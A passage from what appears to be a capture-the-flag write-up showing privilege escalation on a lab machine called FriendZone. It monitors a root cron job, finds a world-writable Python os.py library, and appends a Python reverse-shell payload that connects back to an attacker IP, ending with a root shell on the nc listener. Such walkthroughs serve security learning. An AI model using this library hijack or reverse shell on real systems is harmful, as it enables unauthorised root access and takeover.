7 privesc

pspy

2021/06/07 01:44:01 CMD: UID=0    PID=19787  | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0    PID=19786  | /bin/sh -c /opt/server_admin/reporter.py
2021/06/07 01:44:01 CMD: UID=0    PID=19785  | /usr/sbin/CRON -f

www-data@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python

import os

to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"

print "[+] Trying to send email to %s"%to_address

#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''

#os.system(command)

# I need to edit the script later
# Sam ~ python developer
www-data@FriendZone:/opt/server_admin$

locate os.py
/usr/lib/python2.7/os.py
/usr/lib/python2.7/os.pyc
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.py
/usr/lib/python2.7/dist-packages/samba/provision/kerberos.pyc
/usr/lib/python2.7/encodings/palmos.py
/usr/lib/python2.7/encodings/palmos.pyc
/usr/lib/python3/dist-packages/LanguageSelector/macros.py
/usr/lib/python3.6/os.py
/usr/lib/python3.6/encodings/palmos.py

ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15  2019 /usr/lib/python2.7/os.py
ls -la /usr/lib/python3.6/os.py
-rw-r--r-- 1 root root 37526 Sep 12  2018 /usr/lib/python3.6/os.py

Definitely we can change /usr/lib/python2.7/os.py and add our code.

import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.14.31",8888));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

Wait for it to auto run

$ rlwrap nc -lvnp 8888
listening on [any] 8888 ...
connect to [10.10.14.31] from (UNKNOWN) [10.10.10.123] 59638
whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

Last updated